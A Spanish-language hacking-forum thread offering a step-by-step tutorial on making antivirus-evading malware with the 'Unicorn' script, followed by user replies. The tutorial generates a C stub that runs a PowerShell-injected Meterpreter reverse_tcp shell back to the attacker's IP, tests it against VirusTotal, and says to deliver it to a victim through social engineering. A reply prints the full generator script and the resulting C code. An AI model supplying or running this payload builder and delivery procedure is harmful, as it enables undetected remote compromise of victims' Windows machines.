Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Evadiendo Antivirus con Unicorn

  • 8 Respuestas
  • 5673 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5444
  • Actividad:
    28.33%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Mayo 25, 2017, 11:40:25 am »
¿que es POWERSHELL?, Según Wikipedia:

Citar
Windows PowerShell es una interfaz de consola (CLI) con posibilidad de escritura y unión de comandos por medio de instrucciones (scripts en inglés). Es mucho más rica e interactiva que sus predecesores, desde DOS hasta Windows 7. Esta interfaz de consola está diseñada para su uso por parte de administradores de sistemas, con el propósito de automatizar tareas o realizarlas de forma más controlada. Originalmente denominada como MONAD en 2003, su nombre oficial cambió al actual cuando fue lanzada al público el 25 de abril del 2006.

En definitiva es la linea de comandos de Windows pero mas mejor

Continuemos, desde powershell podemos hacer todo lo que hacemos con el mouse y aun mas cosas ya que te permite crear tareas automatizadas (siempre y cuando uno tenga los conocimientos…obviamente!)

En el ambiente de la seguridad se viene hablando de Powershell como “arma de ataque” desde el 2o1o (Dato que me ayudo MI amigo personal GOOGLE) que fue en la BLACKHAT de ese año en donde se mostró al powershell como vector de ataque (acá la diapo de esa charla, obvio en ingles).

No solo se hablaba de Powershell sino de lo jodido que era para las herramientas ANTIMALWARE y ANTIVIRUS detectar este tipo de scripts, recordemos que Powershell viene en Windows desde la version 7 SP1 y 2008 R2 en donde se instalo la versión 1.0 y hoy en día ya viene por default en todos los Windows y se encuentra en Windows 8.1 y Server 2012 R2 en la version 4.0 por lo tanto es una genial idea pensar en atacar con POWERSHELL ya que afecta a la gran mayoría de los equipos con sistemas operativos de MICROSOFT.

En este post vamos a ver un script en particular escrito en PYTHON que ahora no tengo ganas de explicar que es Python asique te dejo el link que te va a aclarar muchas dudas: http://bfy.tw/11RB

El script se basa en la técnica llamada: “downgrade en Powershell para inyectar un shellcode en memoria”

Se presento por primera vez en la DEFCON 18 (2003) VIDEO DE LA PRESENTACION


El script se llama UNICORNIO (por eso el nombre del post) básicamente genera un código en C que luego de compilarlo se obtiene un ejecutable (“win32” o “.exe” según como quieras llamarlo) y lo mejor de todo es que es 100% indetectable por los AV que existen actualmente.

1- Abrimos KALI y luego Leafpad (block de notas en KALI (Applications > Leafpad)


2 – Copiamos y Pegamos el script que bajamos de la pagina OFICIAL del tipito dueño en el LeafPad.

https://astr0baby.wordpress.com/2013/06/20/unicorn-2-c-source-generator/

nos queda algo así:


3 – Click en FILE > SAVE AS > NAME: “Unicornio.sh” en el DESKTOP (o donde te resulte mas fácil) y por ultimo click en SAVE. Con eso ya lo tenes en el escritorio del KALI.


4 – Luego abrimos una Shell, y nos movemos al desktop con “cd Desktop” y luego hacemos “./Unicornio.sh windows/meterpreter/reverse_tcp 192.168.133.166 443 nonuac”

    Donde dice “./Unicornio.sh” significa que vamos a usar ese script.
    Donde dice “windows/meterpreter/reverse_tcp” es el Payload que voy a usar.
    Donde dice “192.168.133.166” pones la IP del KALI que la obtenes con el comando “IFCONFIG”
    Donde dice “443” es el puerto que vamos a usar.


Se va a ejecutar algo así… si un UNICORNIO.


Cuando esto termine, dentro de la carpeta /root vamos a encontrar un archivo que se llama “unicorn.c”


Click con el boton derecho y le damos en “Open with Leafpad“, luego cuando se abre hacemos click en “EDIT” y luego en “SELECT ALL” y finalmente en “COPY”.

5- Con ese “COPY” que acabamos de hacer nos dirigimos a http://www.onlinecompiler.net/ccplusplus y borramos lo que hay y pegamos lo que acabamos de copiar y le damos click en COMPILE sin tocar nada mas.


Nos va a aparecer algo asi:


Un archivo de nombre raro con “.EXE” lo descargamos porque ese es nuestro SCRIPT compilado para Windows. Luego vamos a la carpeta “Download” y le cambiamos el nombre a lo que nosotros queramos, yo le puse VIRUSKALQ.exe y lo moví al Desktop para mas comodidad pero cada uno hace lo que quiere.

6- Probamos que no sea detectable por los Antivirus mas Comerciales acá usamos las siguientes paginas de análisis de malware.

    https://virusscan.jotti.org/
    https://www.virustotal.com

Pueden usar las 2 o la que mas bronca les genere

Acá les muestro los resultados:


Ya se, te quieres morir el Antivirus que vos tenes instalado NO LO DETECTO y ya estas pensando en cuantos otros archivos así no detecto… tenes que pensar que es 1 o 2 por cada pagina porno que visitaste así que… seguramente sean muchos jajajaja

7- El archivo malicioso se lo enviamos a la victima con ingeniería Social, pero antes en KALI tenemos que ejecutar el “LISTENER” (y no hablamos del enjuague bucal) asi que hacemos lo siguiente:

Abrimos Metasploit con el comando “msfconsole” y ejecutamos lo siguientes comandos y te va a quedar esperando que la victima haga click en el archivo malisioso:


Luego la victima ejecuta el archivo y listo


Bien clarito WINDOWS 8.1 64 Bits..

Autor: Matías


Desconectado redferne

  • *
  • Underc0der
  • Mensajes: 241
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Mayo 27, 2017, 04:36:03 am »
Código: Bash
  1. #!/bin/bash
  2. clear
  3. echo '--------------------------------------'
  4. echo ' Unicorn Powershell2C code generator  '
  5. echo 'Works for Vista, Win7, Win8 32/64 bit'
  6. echo '--------------------------------------'
  7. if [ -z "$*" ];then  
  8. echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
  9. echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
  10. echo 'Valid platforms are: nonuac uac'
  11. exit 0
  12. fi
  13. case $4 in
  14. nonuac)
  15. echo 'Generating nonUAC unicorn.c ...'
  16. python unicorn.py $1 $2 $3  
  17. echo '#include <stdio.h>' > unicorn.c
  18. echo '#include <string.h>' >> unicorn.c
  19. echo '#include <stdlib.h>' >> unicorn.c
  20. echo '#include <ctype.h>' >> unicorn.c
  21. echo '#include <aclapi.h>' >> unicorn.c
  22. echo '#include <shlobj.h>' >> unicorn.c
  23. echo '#include <windows.h>' >> unicorn.c
  24. echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c  
  25. echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
  26. echo 'int main(int argc, char *argv[])' >> unicorn.c
  27. echo '{' >> unicorn.c
  28. echo 'FreeConsole();' >> unicorn.c  
  29. echo -n ' ShellExecute( NULL,NULL, "powershell.exe", "' >> unicorn.c
  30. cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
  31. echo -n '",NULL,NULL);' >> unicorn.c
  32. echo '' >> unicorn.c
  33. echo 'exit(0);' >> unicorn.c
  34. echo '}' >> unicorn.c
  35. todos unicorn.c
  36. echo '[*] Exported unicorn.c To compile use cl.exe unicorn.c'
  37. ;;
  38.  
  39. uac)
  40. echo 'Generating UAC  unicorn.c ...'
  41. python unicorn.py $1 $2 $3
  42. echo '#include <stdio.h>' > unicorn.c
  43. echo '#include <string.h>' >> unicorn.c
  44. echo '#include <stdlib.h>' >> unicorn.c
  45. echo '#include <ctype.h>' >> unicorn.c
  46. echo '#include <windows.h>' >> unicorn.c
  47. echo '#include <aclapi.h>' >> unicorn.c
  48. echo '#include <shlobj.h>' >> unicorn.c
  49. echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
  50. echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
  51. echo 'int main(int argc, char *argv[])' >> unicorn.c
  52. echo '{' >> unicorn.c
  53. echo 'FreeConsole();' >> unicorn.c
  54. echo -n ' ShellExecute( NULL, "runas", "powershell.exe", "' >> unicorn.c
  55. cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
  56. echo -n '",NULL,NULL);' >> unicorn.c
  57. echo '' >> unicorn.c
  58. echo 'exit(0);' >> unicorn.c
  59. echo '}' >> unicorn.c
  60. todos unicorn.c
  61. echo '[*] Exported unicorn.c To compile use cl.exe unicorn.'
  62. ;;
  63.  
  64. "")
  65. echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
  66. echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
  67. echo 'Valid platforms are: nonuac, uac'
  68. exit 0
  69. ;;
  70. esac


inserto ese codigo en el leafpad y le llamo "unicornio.sh" lo guardo en el escritorio
abro consola ejecuto ./unicornio.sh windows/meterpreter/reverse_tcp mi-no-ip 4444 nonuac

y me da este error

Código: Text
  1. --------------------------------------
  2.  Unicorn Powershell2C code generator  
  3. Works for Vista, Win7, Win8 32/64 bit
  4. --------------------------------------
  5. Generating nonUAC unicorn.c ...
  6. python: can't open file 'unicorn.py': [Errno 2] No such file or directory
  7. cat: powershell_attack.txt: No existe el fichero o el directorio
  8. ./unicornio.sh: línea 35: todos: no se encontró la orden
  9. [*] Exported unicorn.c To compile use cl.exe unicorn.c
  10.  
si abro el archivo que se genera "unicornio.c" sale esto

Código: C
  1. #include <stdio.h>
  2. #include <string.h>
  3. #include <stdlib.h>
  4. #include <ctype.h>
  5. #include <aclapi.h>
  6. #include <shlobj.h>
  7. #include <windows.h>
  8. #pragma comment(lib, "advapi32.lib")
  9. #pragma comment(lib, "shell32.lib")
  10. int main(int argc, char *argv[])
  11. {
  12. FreeConsole();
  13.  ShellExecute( NULL,NULL, "powershell.exe", "",NULL,NULL);
  14. exit(0);
  15. }

y he probado en lugar de no-ip poner la ip de kali y es lo mismo


pd:para compilar online suelo usar
https://ideone.com/

« Última modificación: Mayo 27, 2017, 07:09:08 am por sadfud »

Desconectado La-Bestia

  • *
  • Underc0der
  • Mensajes: 72
  • Actividad:
    0%
  • Reputación -4
    • Ver Perfil
« Respuesta #2 en: Mayo 27, 2017, 03:22:21 pm »
Interesante post. habra que probarlo  :) ;D Cuando tenga duda lo publicare.

Primera duda esto es como una especie de "crypter"?

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5444
  • Actividad:
    28.33%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Mayo 27, 2017, 08:23:43 pm »
No, es un metodo de evasión

Saludos,
ANTRAX


Desconectado aphiaminuta

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Junio 09, 2017, 06:57:21 pm »
Antes que nada mi reconocimiento y agradecimiento a la labor de nuestro compañero Antrax. Pues bien dicho esto expongo mi duda: al ejecutar el script Unicornio.sh me genera un archivo .rc y no .c. A qué puede deberse el problema. Perdón por mi ignorancia y gracias de nuevo.

Desconectado KiddArabic

  • *
  • Underc0der
  • Mensajes: 245
  • Actividad:
    10%
  • Reputación 0
  • Vivir sin sueño no es vivir.
    • Ver Perfil
« Respuesta #5 en: Septiembre 23, 2017, 09:58:04 am »
no lo encuentro ahora!

Desconectado blackdrake

  • *
  • Moderator
  • Mensajes: 1915
  • Actividad:
    0%
  • Reputación 15
    • Ver Perfil
« Respuesta #6 en: Octubre 15, 2017, 10:32:58 am »



Desconectado XxironsidexX

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #7 en: Marzo 23, 2018, 10:58:21 pm »
Buenas.
tengo un error al copilar el archivo al parecer me saca error en la copilacion a que se deberia esto?

Desconectado Belcebu

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #8 en: Enero 08, 2019, 07:19:09 am »
hola lo extraño es que cuando hago “./Unicornio.sh windows/meterpreter/reverse_tcp 192.168.133.166 443 nonuac” oviamente con la ip de Kali, se crean los archivos powershell atac.txt y unicorn.rc pero no encuentro por ningún lado el unicorn.c

alguien me puede ayudar???

 

¿Te gustó el post? COMPARTILO!



Crypter [RunPE][Función compresor][9/56 Antivirus]

Iniciado por xxneeco83xx

Respuestas: 14
Vistas: 5964
Último mensaje Noviembre 04, 2015, 06:37:59 pm
por eimattz
Evasión de Antivirus con Shellter

Iniciado por ANTRAX

Respuestas: 1
Vistas: 1683
Último mensaje Julio 19, 2017, 02:58:55 pm
por sadfud
Matar el antivirus

Iniciado por Air5cape

Respuestas: 0
Vistas: 4558
Último mensaje Agosto 31, 2012, 02:36:50 pm
por Air5cape
Evolución de Antivirus

Iniciado por ezephp

Respuestas: 1
Vistas: 2197
Último mensaje Marzo 26, 2015, 03:28:07 pm
por Snifer